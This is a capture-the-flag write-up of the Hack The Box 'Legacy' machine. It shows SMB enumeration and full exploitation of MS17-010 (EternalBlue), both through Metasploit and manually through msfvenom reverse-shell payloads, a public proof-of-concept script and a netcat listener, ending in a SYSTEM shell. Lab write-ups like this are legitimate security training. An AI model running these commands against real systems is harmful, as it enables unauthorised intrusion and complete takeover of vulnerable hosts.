Hack The Box | Legacy


Initial TCP Nmap Scan

nmap -sC -sV -oA nmap/initial-tcp-legacy   

Full TCP Nmap Scan

nmap -p- -oA htb/legacy/nmap/full-tcp-legacy

Output of Initial TCP Nmap Scan

Nmap scan report for
Host is up (0.077s latency).
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h30m33s, deviation: 2h07m16s, median: 4d23h00m33s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:08:52 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-05-28T20:36:26+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 23 08:36:43 2021 -- 1 IP address (1 host up) scanned in 64.79 seconds

Initial Thoughts Based On Nmap Scan

What are ports 139 and 445?

Observing the ports only three appear: 139, 445, and 3389. Port 3389 has its port closed so it will not be considered. So now I am left with only two ports: 139, and 445. Ports 139 and 445 deal with Server Message Block (“SMB”) protocols. SMB is essentially a protocol that allows applications and services on networked computers to communicate with each other. SMB allows for core features such as printing, file sharing, device sharing, etc. Port 139 originally ran on top of NetBIOS using port 139. In simple terms, NetBIOS provides services related to the session layer of the OSI model which would allow computers to talk to each other on the same network (Local Area Network (“LAN”)). Port 445 (used with later versions of SMB) began to use port 445 on top of a Transmission Control Protocol (“TCP”). TCP is simply a transport protocol that is used on top of Internet Protocol (“IP”) to transmit packet. The IP relays datagrams across network boundaries and its routing enables internetworking and essentially establishes the internet.

How can these ports be exploited?

Again, SMB allows core features such as printing, file sharing, device sharing, etc. Knowing this, misconfigurations / poor security may have been overlooked. These misconfigurations / poor security can be things such as: null authentication (being able to get into SMB file shares with no authentication), ability to enumerate users through SMB, personally identifiable information (“PII”), etc. Another thing port 139 and 445 can be exploited by are simply out of date SMB versions. Some out of date SMB versions are highly vulnerable and can lead to a full system compromise so looking into that too is ideal.

139 - 445 SMB Enumeration

The first tool I will be using is Enum4linux which is a tool used for enumerating information from SMB.

enum4linux -a
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun May 23 09:08:16 2021        
|    Target Information    |                               
Target ...........                              
RID Range ........ 500-550,1000-1050           
Username ......... ''                                      
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none                                                                    

|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: HTB                         

|    Nbtstat Information for    |               
Looking up status of                            
LEGACY          <00> -         B <ACTIVE>  Workstation Service      
HTB             <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name                                               
LEGACY          <20> -         B <ACTIVE>  File Server Service                                                 
HTB             <1e> - <GROUP> B <ACTIVE>  Browser Service Elections                                           
HTB             <1d> -         B <ACTIVE>  Master Browser                                                                                                                                                                             
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser                                                      

MAC Address = 00-50-56-B9-08-52         

|    Session Check on    |
[+] Server allows sessions using username '', password ''                                                   

|    Getting domain SID for    |                
Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED                                                         
[+] Can't determine if host is part of domain or part of a workgroup                                                   

|    OS information on    |                     
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.                        
[+] Got OS info for from smbclient: 
[+] Got OS info for from srvinfo:               
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED         
|    Users on    |                                                                                          
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED                                                   
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED                                                    
|    Share Enumeration on    |                  
[E] Can't list shares: NT_STATUS_ACCESS_DENIED             

[+] Attempting to map shares on

|    Password Policy Information for    |
[E] Unexpected error from polenum:

[+] Attaching to using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:

[+] Trying protocol 445/SMB...

[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

[E] Failed to get password policy with rpcclient

|    Groups on    |

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

|    Users on via RID cycling (RIDS: 500-550,1000-1050)    |
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

|    Getting printer info for    |
No printers returned.

enum4linux complete on Sun May 23 09:08:26 2021

Seeing the output of Enum4linux, it was able to get a null session meaning we were able to use an anonymous user by supplying a username and password of '', essentially an empty string. Looking at all of the output though we were not able to enumerate a lot. Sure, we were able to get a null session, but we do not have the privileges to enumerate anything (note all of the NT_STATUS_ACCESS_DENIED messages). I could try to use other tools and see if they provide a different output (which isn’t a bad thing to do), but this is looking like it will not budge in terms of gathering any information this way. So what’s next?


Looking into if SMB is vulnerable due to it being outdated is what I will be looking into next. This is fairly simple as Nmap has a feature known as the Nmap Scripting Engine (“NSE”). NSE are simple scripts using the Lua programming language used to automate a variety of networking tasks. These tasks an include network discovery, version detection, and yes you guessed it, vulnerability detection. Nmap supplies a plethora of scripts to help us further enumerate and scan for vulnerabilities with SMB. Doing a quick google search of Nmap NSE SMB scripts will provide a lot of information on each specific script and what it is used for. For now, I will essentially be doing a full enumeration and vuln scan using a ton of NMAP scripts for SMB and seeing if anything is vulnerable.

nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 09:21 PDT           
Nmap scan report for                                                                       
Host is up (0.078s latency).                   
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
| smb-enum-shares: 
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: <blank>
|   \\\ADMIN$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\\C$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\\IPC$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: READ
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-05-28T21:22:05+03:00
|_smb-print-text: false
| smb-protocols: 
|   dialects: 
|_    NT LM 0.12 (SMBv1) [dangerous, but default]
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb2-time: Protocol negotiation failed (SMB2)

Nmap done: 1 IP address (1 host up) scanned in 88.81 seconds

Seeing the output from Nmap, we can see some of the scripts failed (most likely because it was not vulnerable), but we do see that it found one vulnerability which is smb-vuln-ms17-010. This vulnerability is also known as EternalBlue which was developed by the NSA. If you want to read more about EternalBlue, you can check out a Wikipedia page about it here. For now, let’s figure out if we can gain initial access to this machine through this attack vector.

Exploiting EternalBlue

When approaching this exploit, there are two ways we can do this: manually, or with the Metasploit Framework. “The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development” (Rapid7). Seeing what Metasploit is, it definitely sounds like an enticing option, but if you are prepping for the OSCP, you might want to do Metasploit and a manual method. The reason for this is using the Metasploit Framework is only allowed once for the OSCP. Knowing this, it seems practical to go and figure out how to manually exploit this as well as use the Metasploit Framework so let’s do both.

Metasploit Framework

└─# msfconsole                          
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

       =[ metasploit v6.0.41-dev                          ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Enable HTTP request and response logging 
with set HttpTrace true

msf6 > search ms17-010

Matching Modules

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use exploit/windows/smb/ms17_010_psexec 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                            Required  Description
   ----                  ---------------                            --------  -----------
   DBGTRACE              false                                      yes       Show extra debug trace info
   LEAKATTEMPTS          99                                         yes       How many times to try to leak transaction
   NAMEDPIPE                                                        no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/word  yes       List of named pipes to check
   RHOSTS                                                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<
   RPORT                 445                                        yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                              no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                             no        The service display name
   SERVICE_NAME                                                     no        The service name
   SHARE                 ADMIN$                                     yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal r
                                                                              ead/write folder share
   SMBDomain             .                                          no        The Windows domain to use for authentication
   SMBPass                                                          no        The password for the specified username
   SMBUser                                                          no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/smb/ms17_010_psexec) > set lhost
lhost =>
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts
rhosts =>
msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 
[*] - Target OS: Windows 5.1
[*] - Filling barrel with fish... done
[*] - <---------------- | Entering Danger Zone | ---------------->
[*] -    [*] Preparing dynamite...
[*] -            [*] Trying stick 1 (x86)...Boom!
[*] -    [+] Successfully Leaked Transaction!
[*] -    [+] Successfully caught Fish-in-a-barrel
[*] - <---------------- | Leaving Danger Zone | ---------------->
[*] - Reading from CONNECTION struct at: 0x81a8e168
[*] - Built a write-what-where primitive...
[+] - Overwrite complete... SYSTEM session obtained!
[*] - Selecting native target
[*] - Uploading payload... zZKBrhbC.exe
[*] - Created \zZKBrhbC.exe...
[+] - Service started successfully...
[*] Sending stage (175174 bytes) to
[*] - Deleting \zZKBrhbC.exe...
[*] Meterpreter session 1 opened ( -> at 2021-05-23 09:36:32 -0700

meterpreter >

And just like that we have a SYSTEM session. SYSTEM is the highest privileged session we can have on a Windows workstation. But I’m going to break down what exactly I entered in to get this SYSTEM session

First, you can simply type msfconsole in your terminal to get access to the Metasploit Framework. From here I needed to search for the ms17-010 vulnerability within Metasploit Framework to see if they have modules I can use to exploit this vulnerability. To do this, you can type in search [exploit_name] to find the exploit you are searching for and see if it is present. For me, this was search ms17-010. The one that worked the best for me was: 2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 . Now that we know the module exists, to use this module you are going to use the path that it provides. This would be exploit/windows/smb/ms17_010_psexec.


With that done, the only thing left to do is configure the module. To configure the module and see what values it needs to run, simply execute the options command. For this module, everything was already set in stone for the most part, the only thing that we needed to change was the LHOST and the RHOST. LHOST stands for local host, aka, your IP address. So this is going to be your HTB VPN IP address. Then there is RHOST, which stands for remote host. This is going to be the IP address of our target, so To enter in these values into the module, simply type the name and then an argument. For example: RHOST This will set the RHOST as All you need to do is set LHOST as well in a similar fashion and everything should be set. Now you can execute the exploit command and then get a shell! Easy as that.

Manual Exploit

When looking into manual exploits, there may be a chance that there is already a proof of concept (“PoC”) publicly available. Looking up “ms17-010” into Google, I found a repo from the user “helviojunior” who has a pretty nice repo to clone from that will help us exploit ms17-010 without the Metasploit Framework. Link to the GitHub repo can be found here. The specific file I’ll be working with is the send_and_execute.py file. To clone this repo you can run the following command:

git clone https://github.com/helviojunior/MS17-010.git

The reason for this is that when looking into each of these files, this is the one that has been tested on Windows XP which is what our box is. With this exploit, we are going to need a payload. For this, we can use MSFvenom which will create our Windows reverse shell payload.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f exe > eternalblue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Breaking down the flags, -p specifies what type of payload we want, -f specifies what format we want, which is an executable file (exe). LHOST is similar to what we saw in the Metasploit Framework section where LHOST is your local host and LPORT is your local port. With this payload, we will be creating an executable payload called eternalblue.exe. You could name this whatever you want and have .exe at the end. So now after this we should have an executable called eternalblue.exe in our working directory.

ls -la eternalblue.exe
-rw-r--r-- 1 root root 73802 May 23 14:24 eternalblue.exe

Now I’m going to use the send_and_execute.py file to send over our reverse shell payload eternalblue.exe.

Looking at what is needed from this Python script, we see the following:

python send_and_execute.py                                         
send_and_execute.py <ip> <executable_file> [port] [pipe_name]

So we need to run the command send_and_execute.py, give an ip address, and an executable file. We have all of those! So let’s pwn this machine manually. Make sure you have a Netcat listener running in the background using the same LPORT you assigned when crafting your MSFvenom reverse shell payload.

nc -lvnp 4444

WIth my Netcat listener set listening on port 4444, just like I stated on my MSFvenom reverse shell payload, I am going to go ahead and execute the exploit.

python send_and_execute.py eternalblue.exe

Trying to connect to
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81b2dda8
SESSION: 0xe17c1190
FLINK: 0x5bd48
InData: 0x5ae28
MID: 0xa
TRANS1: 0x58b50
TRANS2: 0x5ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1fb0030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1fb00d0
overwriting token UserAndGroups
Sending file WIM5S5.exe...
Opening SVCManager on
Creating service HamL.....
Starting service HamL.....
The NETBIOS connection with the remote host timed out.
Removing service HamL.....
ServiceExec Error on:

Looking back at our reverse shell we successfully got a shell!

nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


The whoami command is not running on the box, but we can get this to work an alternative way.

'whoami' is not recognized as an internal or external command,
operable program or batch file.

Kali Linux comes with Windows binaries that can allow us to run the whoami command. To do this, we can simply host our own SMB server and have the compromised Windows box call to our SMB server to execute the command. Firstly, let’s get the SMB server set up. To do that you can run the following command:

smbserver.py share /usr/share/windows-binaries/

Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

With that running, we are hosting an SMB server named share under the directory /usr/share/windows-binaries/ which is where the whoami binary resides. Now we can head back to our compromised Windows box and use the command \\$IP\share\whoami.exe to connect to the SMB server and run the whoami binary.


And we can see we are SYSTEM!